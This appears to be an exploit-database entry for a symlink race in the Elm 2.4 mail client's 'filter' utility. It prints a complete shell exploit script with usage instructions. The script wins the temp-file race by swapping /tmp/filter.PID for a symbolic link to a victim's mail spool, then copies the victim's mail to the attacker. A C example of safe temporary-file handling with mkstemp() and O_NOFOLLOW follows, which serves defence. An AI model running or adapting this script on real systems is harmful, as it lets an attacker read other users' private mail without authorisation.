Elm 2.4 – ‘filter’ Arbitrary Mail Disclosure

Vulnerability ID: 1053338 Vulnerability type:
Published: 1995-12-26 Updated: 1995-12-26
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/20291
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/1802/info

Elm is a popular Unix mail client. A vulnerability exists in Elm's 'filter' utility which can grant an attacker access to any user's mail spool. By exploiting a race condition which exists in the creation of temporary files, an unauthorized user can delete an open temporary file and replace it with a symbolic link pointing to any other user's mail spool. The mailmessage function will then follow this link, and copy the contents of the victim's mail file to that of the attacker. The obvious result is that the attacker is able to read the victim's mail messages.


#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. ([email protected])
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
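
A defensive counterpart to the race described above, as an added example (not Elm's code and not part of the original advisory): the temporary file is created atomically with mkstemp(), and if it must be reopened by name, the open refuses symbolic links and checks that the device and inode still match. The function names tmp_create and tmp_reopen are hypothetical.

```c
/* Added example: safe temporary-file handling. Not Elm's code;
 * tmp_create() and tmp_reopen() are hypothetical names. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create the temp file atomically. mkstemp() fills in an unpredictable
 * name and opens it with O_CREAT|O_EXCL and mode 0600, so a pre-planted
 * file or link at that path makes the call fail instead of being used.
 * Returns the fd and stores the file's identity in *id; -1 on error. */
int tmp_create(char *tmpl, struct stat *id)
{
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return -1;
    if (fstat(fd, id) < 0) {
        close(fd);
        unlink(tmpl);
        return -1;
    }
    return fd;
}

/* Reopen by path only if it is still the file tmp_create() made.
 * O_NOFOLLOW refuses a symbolic link in the last path component; the
 * device/inode comparison on the opened fd refuses any other file that
 * was put at the same name. The comparison is reliable while the
 * original fd stays open, because that keeps the inode from being
 * reused. Prefer keeping that fd and never reopening by name at all.
 * Returns an fd, or -1 if the path was refused. */
int tmp_reopen(const char *path, const struct stat *id)
{
    struct stat now;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &now) < 0 || !S_ISREG(now.st_mode) ||
        now.st_dev != id->st_dev || now.st_ino != id->st_ino) {
        close(fd);
        return -1;
    }
    return fd;
}
```

The predictable name /tmp/filter.$FREAD seen in the script is what mkstemp() avoids; the identity check covers the case where a name has to be reused anyway.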
